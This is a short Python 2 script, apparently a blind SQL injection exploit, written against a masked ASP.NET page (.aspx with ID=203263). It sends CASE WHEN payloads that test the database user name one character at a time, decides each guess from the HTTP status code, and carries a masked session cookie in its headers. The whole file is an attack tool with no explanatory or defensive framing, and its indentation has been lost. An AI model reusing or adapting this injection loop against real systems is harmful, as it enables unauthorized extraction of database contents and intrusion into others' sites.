#encodeing=utf-8
import requests
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')
headers = {
'Cache-Control':'max-age=0','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Upgrade-Insecure-Requests':'1','User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36','Accept-Encoding':'gzip, deflate, sdch','Accept-Language':'zh-CN,zh;q=0.8','Cookie':'*****************************************'
}
print "test..."
user=""
for i in range(1,7):
for payload in payloads:
user+=payload
aaa="--"
d="(case when (left(user,%s))='%s' then 1 else 0 end)" % (i,user)
test = d + aaa
r=requests.get('http://**********/******.aspx?ID=203263/'+test,headers=headers)
if r.status_code==200:
print user
break
else:
user=user[:-1]